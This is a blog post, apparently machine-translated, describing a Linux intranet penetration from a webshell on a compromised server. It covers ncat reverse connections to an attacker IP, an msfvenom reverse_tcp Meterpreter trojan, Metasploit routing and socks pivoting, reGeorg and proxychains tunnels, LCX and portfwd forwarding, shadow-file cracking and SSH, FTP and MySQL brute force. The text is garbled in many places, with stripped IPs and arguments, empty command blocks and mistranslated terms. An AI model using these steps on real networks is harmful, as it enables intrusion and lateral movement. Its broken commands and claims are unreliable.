playing with linux system

Posted by barello at 2020-02-25

Some time ago, I did a unsuccessful and incomplete Linux intranet penetration. It was not successful because I did not take the permissions of other servers in the intranet. It was incomplete because I was forced to suspend the test for some reasons. Although this time Linux intranet penetration is not a good teaching case, I decided to record the process, especially the idea of Linux intranet penetration to prevent forgetting. There are a lot of information about intranet penetration on the Internet, and I also read a lot of information before I did the test. The title of this article highlights Linux, because this test does not involve windows system. Of course, Linux and windows intranet penetration principle are similar, but the tools used are different.

Collect test network environment

When we get a target intranet server, or broiler server, the first thing to do is to collect information. In my opinion, one of the most important information that needs to be collected is the network environment of broilers.

Experimental environment

First, introduce the server environment of this test:

This test simulation assumes that: due to the opening of the web application with vulnerability on the broiler server, it is implanted into the webshell by intrusion. The purpose of this test: through the shell on the broiler server, penetrate into the server of the intranet 17 network segment.

What network data are collected and tested?

OK, now that I have a chicken shell, which network environment should I collect chicken servers? How to test? I think at least the following network environment information should be collected:

Note: connectivity mainly refers to whether the two sides can ping each other. Port access restriction refers to whether there is a bastion machine or firewall at the target network boundary and whether there is a restriction on the ports in and out.

Port access restriction test

Ping test is not introduced here. It mainly talks about how to test port access restrictions. The tools available are as follows:

Before testing port access restrictions, we need to understand the current network environment. In this test, the attacker is on the external network while the broiler is on the internal network, so under normal circumstances, the attacker cannot directly access a port on the broiler (the network border router is required to do port mapping).

Reverse connection test

When we test port access restrictions, we can first use NCAT to monitor a port on the attacker.


ncat -l -p 9999

Then I use tools like NCAT or telnet to try to connect on the broiler, which I call reverse connection test.


ncat 110.xx.xx.xx 9999

Note: the monitoring port can be randomly selected, and try to select multiple ports as many times as possible; if the broiler can access any port of the attacker, it means that the target network boundary does not restrict the outgoing connection, so understanding this information is very good for the subsequent port forwarding.

Forward connection test

We can also monitor a port on the broiler and try to connect on the attacker (here is the external IP address of the broiler, and the open web application of the broiler must exist in the form of an external IP or domain name, which is not the real IP address of the broiler in this test, but the IP of the target boundary network device. The principle is to map the network device through the port The web port on (Internet IP) is mapped to the web port of broiler (intranet IP), which I call forward connection test. The significance of trying to connect the port of the external network address of broiler is that some careless administrators will set the full port mapping on the network device, that is to say, any port monitored on the broiler can be mapped to the same port of the network boundary device, so this is no different from that the broiler server is directly on the external network.

Collect server information

Collecting information can be said to be the first step of penetration test. The same is true for intranet penetration. The more server information is collected, the greater the success rate of penetration.

View system kernel

The kernel version on Linux system is as follows:


lsb_release –a

In general, the way of system intrusion is to raise the right first, which can be done through Linux kernel vulnerability. Therefore, you can check the version of Linux kernel first, and then find the website of exp according to the kernel, upload exp to raise the right. As this test does not involve the right lifting part, no test will be carried out. In addition, it adds that the kernel right lifting has the risk of downtime. Please operate carefully.

View operating system bits

The number of viewing digits on Linux system is as follows:


getconf LONG_BIT

Note: it is helpful to know whether the system is 32-bit or 64 bit for the later generation of MSF Trojan horse.

System sensitive information

Collect some system related sensitive information, such as account password, log, historical command, SSH file, etc.













Web sensitive information

If the server has a web application, you can check whether there is sensitive information in the web directory, such as the configuration file connecting to the database and so on.

Intranet scan

After information collection, you can try to scan the intranet machines, such as host survival scan, port scan, ARP scan, etc. Port scanning can use nmap, MSF and other tools, but if these tools are not installed on the server, there are usually three ways to achieve the effect of internal network port scanning. The first is to install scanning tools on the server, which is not recommended here, because it is dynamic and cumbersome (of course, you can upload the script of Python scanning port, without compiling and installing, which is more convenient. ); the second is port forwarding, which forwards the internal port of the server to the external network for scanning; the third is agent scanning, which is to proxy the attacker equipped with scanning tools to the target internal network environment. Whether it is port forwarding scanning or agent scanning, the principle is to get through the connectivity between the attacker (external network) and the broiler (internal network), that is, the attacker can directly access the intranet resources where the broiler is located. The connection here does not rely on the port mapping function of the target network boundary device, so it is different from the connection generated by the attacker accessing the broiler web service.

Port forwarding

To achieve the above "direct" connection, we need an intermediate bridge to transmit data between the intranet and the Internet (attacker and broiler). There are many ways to build this bridge. First of all, we can think of port forwarding, i.e. forwarding a port on the broiler server to a port on the attacker. In this way, accessing a port on the attacker is equivalent to accessing a port on the broiler server.

Port forwarding tools: LCX, meterpreter, etc. the specific usage will be introduced later: TCP port forwarding, HTTP forwarding, SSH forwarding, etc

TCP port forwarding

Local forwarding: monitor ports 2222 and 3333 on the attacker, connect port 2222 of the attacker on the broiler, and forward port 22 to the broiler. Forwarding connection principle:


22 port of broiler

Note: at this time, we connect port 3333 of the attacker, which is equivalent to port 22 of the broiler.

Remote forwarding: monitor port 2222 and 3333 on the attacker, connect port 2222 of the attacker on the broiler, and forward port 22 of the intranet target server. (the premise is that the broiler can connect to port 22 of the target server) forwarding connection principle:


Intranet target server 22 port < -- > Random high port of broiler

Note: at this time, we connect to port 3333 of the attacker, which is equivalent to port 22 of the target server.

Note: from the above connection process, it is easy to see that the reason why port forwarding is more difficult to prevent is that the port monitored by the attacker is random and unpredictable, so it is impossible to make the direction port policy on the bastion machine or firewall in advance, unless the server is forbidden to access all the external ports (in reality, the port connection in the direction is mostly limited System).

HTTP forwarding

Some administrators with strong security sense will make the policy of forbidding access to the external network to some servers, that is, the server forbids connection to any external network port. At this time, normal TCP port forwarding has no effect, because the premise of forwarding is to be able to connect with each other. In this case, HTTP forwarding can be used. Forwarding connection principle:


Broiler web port (80) < network boundary device port (80) < attacker random port

Note: the reason why we can connect here is through the web services on the server and the mapping function of network boundary devices.

Note: Although the broiler can not access any port of the Internet, as long as it provides Web services to the outside world, it can also communicate with the outside world, but this kind of communication is limited to the web service port, and the broiler does not directly communicate with the attacker, but with the help of boundary devices.

Proxy scan Intranet

The above describes the use and principle of several port forwarding, from which we can see that port forwarding is powerful, but also limited, because each time only one port of an IP can be forwarded, for scanning, it is not the best choice. Therefore, a better technical solution - proxy scanning, whose principle is similar to port forwarding, is to build a bridge, which is often not a port, but a shell or session.

Proxy scanning can also be divided into TCP proxy scanning and HTTP proxy scanning.

HTTP proxy forwarding

If the target server has a web system, you can use regeorg + proxychains. Tool download: regorg and proxychains upload the tunnel file of regorg to the broiler server to the website directory, and the attacker executes:


python -p 2333 -u

Then modify the proxychains.conf configuration file


VIM / etc / proxychains.conf (on the Mac, ~ /. Proxychains / proxychains.conf, if not, create it yourself)

On the last line, add Socks5 2333 (same port as regeorg)

Finally, when the attacker uses the scan tool, it can add proxhcains4 before the executed command, for example:


proxychains4 nmap -sT -Pn -n

Note: this scheme is suitable for both attacker and broiler server in their own Intranet environment. The attacker can access the HTTP service of the target server and forward through the HTTP service (slower speed)

TCP proxy forwarding

Idea: bounce a broiler's metapreter shell back to the attacker through the metaploit Trojan, then set the route on the metapreter shell, and we can directly scan the segment server where the broiler is on the attacker (here it can be scanned across segments).

Generate MSF Trojan

Generate Trojan:


Msfvenom - P Linux / x86 / meterpreter / reverse_tcp lhost = attacker IP lport = 8000 - f elf > shell_8000.elf

Because the attacker cannot access the port of the broiler, and the broiler can access the port of the attacker, a reverse trojan is generated.

Rebound shell

The attacker runs msfconsole, uses the exit / multi / handler module, set payload Linux / x86 / meterpreter / reverse_tcp, which is the same as the payload used to generate the Trojan horse. Lport is set as the port that the Trojan will connect to. After running, it will monitor a port on the attacker and wait for the Trojan link. At this time, upload the shell_8000.elf to the broiler server. After adding permissions, running the Trojan will actively connect to the port monitored by the attacker and obtain a meterpreter shell on the attacker.

Route setting

In the previous step, we got a session, which is a session between the attacker and the broiler. Check the network of broilers:


run get_local_subnets

Add route:


run autoroute -s

To view routes:


run autoroute –p

Generally speaking, it is OK to set the route here, but sometimes it will be found that it works in the meterpreter, but it fails in MSF, so you can set it again in MSF. (provided that the meterpreter session always exists) put the session in the background and enter MSF to add routes. View route: here is the result of adding. Add route command:



msf exploit(handler) > route add 12

msf exploit(handler) > route add 12

Note: 12 indicates the session ID. since we need to access segment 17, we need to add the route of segment 17 here.

Note: the above two routes mean that if the attacker wants to access the resources of 17 or 16 network segments, its next hop is session12. As for what is the next one, I won't say much. Anyway, the attacker can access the resources of the intranet at present.

Forwarding connection principle:


The attacker is not a port, but a route

TCP global proxy forwarding

With the above settings, you can access intranet resources in MSF, but only in MSF. If you want other tools to use the proxy, you need to set the global proxy. You need to use the socks4a tool proxy in the MSF framework, directory: auxiliary / server / socks4a, and then cooperate with proxychains. The use method is similar to HTTP proxy.

Note: this agent is not an HTTP agent, but a TCP agent. Therefore, the target server or the attacker server is required, and one party is in an external network environment. Otherwise, the Trojan port cannot be connected, and the meterpreter shell cannot be obtained.

For the operation of Metasploit, please refer to: Metasploit

Port scan tool

It is recommended to use Metasploit for TCP proxy forwarding, and use many scanning modules integrated on MSF to scan directly. Scanning module:

In addition, we can also use nmap and other scanning tools, combined with TCP global agent forwarding.

Intrusion for port 22

After scanning out the port of intranet server, we can first choose the server with open port 22 for intrusion attempt. There are two ways to attack port 22. The first is to read the plaintext password of the chicken first, and then try to log in with the plaintext password; the second is to log in violently with the dictionary.

Try to hash

If the permission is enough, we can read the contents of the / etc / shadow file smoothly, but it is encrypted, so we can try to crack it with tools.

Note: mimikatz can be used under Windows

Note: it is very important to obtain the plaintext password of Linux account, because there may be only a few Intranet environment administrators, and the passwords set by different servers may be the same, so you can use the obtained server password to try to log in to other intranet servers with 22 ports open.

Dictionary brute force

There's nothing to say about this. It mainly depends on whether the dictionary is powerful and whether there are explosion prevention restrictions. Tools:

Intrusion against other ports

In addition to port 22, 21 (FTP), 3306 (MySQL), 1433 (MSSQL), etc. can be broken by brute force. What about other segment ports? For example, 445, 443, etc., these vulnerabilities can be attacked through the corresponding vulnerabilities, and can be scanned by using the Nessus scanner to attack the discovered vulnerabilities by collecting the corresponding modules on the MSF.

Intrusion against web services

In addition to the above ports, there is a special type of port, which is the web service port, such as 80, 443, 8000 +, etc. Because there are web applications on these ports, web applications are vulnerable points. Therefore, we can focus on finding the servers with web services in the intranet, and penetrate their web applications according to the process of Web penetration test.

Counter attack of port forwarding

The port forwarding technology was introduced before, but I did not use this scheme in the scanning phase. Is port forwarding useless in Intranet penetration? In fact, this is not the case. The stage of vulnerability exploitation after intranet scanning is the real stage of port forwarding. At this stage, we can use port forwarding to forward a port of a server with vulnerability and exploit it separately. We can think that in windows, we can use LCX to forward port 3389, and in Linux, we can also forward port 22. Of course, it is better to use port 80 to access the intranet web services locally, so as to continue the pattern of Web penetration and expand the attack area.

Meterpreter realizes port forwarding

In the meterpreter shell, type:


meterpreter > portfwd add -l 55555 -r -p 3306

Note: it means to forward the 3306 port on the server to the 55555 port of the local (attacker), and then we can run MySQL – h – u root – P 55555 – P locally to log in MySQL of the intranet server. Other ports, such as SSH and FTP, are similar. This process is similar to MSF agent.


Forward port 22 of broiler to port 2222 of attacker to see the connection. It is found that port 2222 is monitored on the attacker and connected to a high port outside the attacker. The 22 port of the broiler is also connected to a high port of the broiler itself. How are the two high ports between the two servers connected? I think it's definitely using the meterpreter session. Therefore, the meterpreter session is equivalent to a middleman, delivering messages that could not be delivered originally.

LCX port forwarding

Attack aircraft:


LCX - Listen 2222 3333 - 2222 is the forwarding port, 3333 is any unoccupied port of the machine



lcx -slave 2222 3389 is the external network IP of attacker, 2222 is the forwarding port, is the internal network IP of broiler, 3389 is the remote terminal port.

Sniffing Intranet

Cain can be used in windows and MSF can be used in Linux. Of course, in general, it's better not to use the intranet sniffer, because there is too much activity and may affect the intranet.

Linux intranet security recommendations

I have said so many ways of internal network penetration. According to the Convention, I should give some suggestions on the construction of internal network security. Of course, it's just my personal opinion. I can leave a message together for discussion.

Reference articles


[play linux series] VIM uses [play linux series] Linux basic command [play linux series] shell programming